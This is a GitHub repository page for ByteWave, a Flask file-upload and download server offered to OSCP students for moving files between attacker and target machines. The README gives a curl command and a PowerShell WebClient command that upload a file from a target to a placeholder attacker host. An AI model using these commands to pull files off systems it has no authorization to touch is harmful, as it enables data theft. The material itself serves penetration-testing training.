Skip to content

sazzad1337/ByteWave

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

ByteWave

bytewave"/

ByteWave is a simple Flask web application for uploading, downloading, and managing files between both attackers <-----> target endpoints. It provides a user-friendly interface for handling file operations from CLI and browsers. This file upload technique can be valuable for the students preparing for the OSCP exam.

Setup

  1. Clone the repository:

    git clone https://github.com/sazzad1337/ByteWave.git
    
  2. Run the Flask application:

    python bytewave.py
    

Features

  • File Upload:

    Linux:

    poc

    curl -F "file=@FILENAME" http://IP/upload

    Windows PowerShell:

    (New-Object System.Net.WebClient).UploadFile('http://IP/upload', 'FILENAME')
  • Manage Files:

    http://IP/files

files

About

Simple file transfer tool based on python.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published